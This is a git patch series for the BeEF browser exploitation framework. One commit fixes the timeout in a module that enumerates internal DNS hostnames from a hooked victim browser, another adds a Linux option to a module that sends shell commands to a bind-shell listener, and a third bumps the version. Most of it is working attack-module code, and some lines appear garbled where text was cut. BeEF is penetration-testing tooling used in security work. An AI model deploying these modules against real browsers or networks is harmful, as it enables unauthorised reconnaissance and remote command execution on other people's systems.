From e95c74b5e159f4b96d7f4406e212a797969c398a Mon Sep 17 00:00:00 2001 From: Nbblrr Date: Fri, 28 Jun 2013 14:33:33 +0200 Subject: [PATCH 1/3] DNS Enumeration module does not consider the user timeout parameter --- modules/network/dns_enumeration/command.js | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/network/dns_enumeration/command.js b/modules/network/dns_enumeration/command.js index cd7397570..172a34c2d 100644 --- a/modules/network/dns_enumeration/command.js +++ b/modules/network/dns_enumeration/command.js @@ -9,26 +9,26 @@ beef.execute(function() { var dns_list = "<%= @dns_list %>"; var timeout = parseInt("<%= @timeout %>"); - var cont=0; + var cont=0; var port = 900; var protocol="http://"; var hostnames; if(dns_list!="%default%") { - hostnames = dns_list.split(","); + hostnames = dns_list.split(","); } else { hostnames = new Array("abc", "about", "accounts", "admin", "administrador", "administrator", "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev", "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1", "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp", "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap", "imap3", "imap4", "install", "intern", "internal", "intranet", "irc", "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns", "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10", "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18", "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6", "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub", "public", "preprod", "root", "route", "router", "server", "smtp", "sql", "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess", "webadmin", "webmail", "webserver", "website", "win", "windows", "ww", "www", "wwww", "xml"); } - + function notify() { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Internal DNS found: '+ hostnames[cont]); check_next(); } - - function check_next() { + + function check_next() { cont++; - if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); + if(cont', <%= @command_id %>, 'result=DNS Enumeration done') }, 1000); } function do_resolv(url) { @@ -42,15 +42,15 @@ beef.execute(function() { } else { return -1; } - + xhr.onreadystatechange= function(e) { if(xhr.readyState==4) { clearTimeout(p); check_next(); } }; xhr.send(); - var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, 4000); + var p = setTimeout(function() { xhr.onreadystatechange = function(evt) {}; notify(); }, timeout); } beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Starting DNS enumeration: '+ hostnames.length + ' hostnames loaded'); if(do_resolv(protocol + hostnames[0] + ":" + port)==-1) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser not supported'); } }); From 164ff5bea629e520e281ff025528ed4c43b21fe6 Mon Sep 17 00:00:00 2001 From: bmantra Date: Fri, 28 Jun 2013 20:42:53 +0200 Subject: [PATCH 2/3] added option for LF only, to use with Linux --- modules/exploits/beefbind/beef_bind_shell/command.js | 7 ++++++- modules/exploits/beefbind/beef_bind_shell/module.rb | 6 +++++- 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/modules/exploits/beefbind/beef_bind_shell/command.js b/modules/exploits/beefbind/beef_bind_shell/command.js index da6d040f0..afd6b8256 100755 --- a/modules/exploits/beefbind/beef_bind_shell/command.js +++ b/modules/exploits/beefbind/beef_bind_shell/command.js @@ -9,6 +9,7 @@ beef.execute(function () { var rport = '<%= @rport %>'; var path = '<%= @path %>'; var cmd = '<%= @cmd %>'; + var shellcode ='<%= @shellcode %>'; var uri = "http://" + rhost + ":" + rport + path; @@ -73,7 +74,11 @@ beef.execute(function () { }; xhr.open("POST", uri, false); xhr.setRequestHeader("Content-Type", "text/plain"); - command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + if (shellcode == 'Linux'){ + command = "cmd=" + command + "\n"; // very important only LF + }else{ + command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?" + } xhr.send(command); setTimeout("get_additional_cmd_results()",500); }; diff --git a/modules/exploits/beefbind/beef_bind_shell/module.rb b/modules/exploits/beefbind/beef_bind_shell/module.rb index 5eac5a4a0..dc84c3c03 100755 --- a/modules/exploits/beefbind/beef_bind_shell/module.rb +++ b/modules/exploits/beefbind/beef_bind_shell/module.rb @@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'}, { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'}, { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'}, - { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'} + { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}, + { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore', + 'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']], + 'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true + } ] end From e61b26692145486d7f9a7836d6c4d455be81a375 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 1 Jul 2013 00:42:47 +0930 Subject: [PATCH 3/3] update version --- VERSION | 2 +- config.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/VERSION b/VERSION index 1c48bbad1..11ac0da8e 100644 --- a/VERSION +++ b/VERSION @@ -4,4 +4,4 @@ # See the file 'doc/COPYING' for copying permission # -0.4.4.6-alpha +0.4.4.7-alpha diff --git a/config.yaml b/config.yaml index 54728de0d..a70f427f2 100644 --- a/config.yaml +++ b/config.yaml @@ -6,7 +6,7 @@ # BeEF Configuration file beef: - version: '0.4.4.6-alpha' + version: '0.4.4.7-alpha' debug: false restrictions: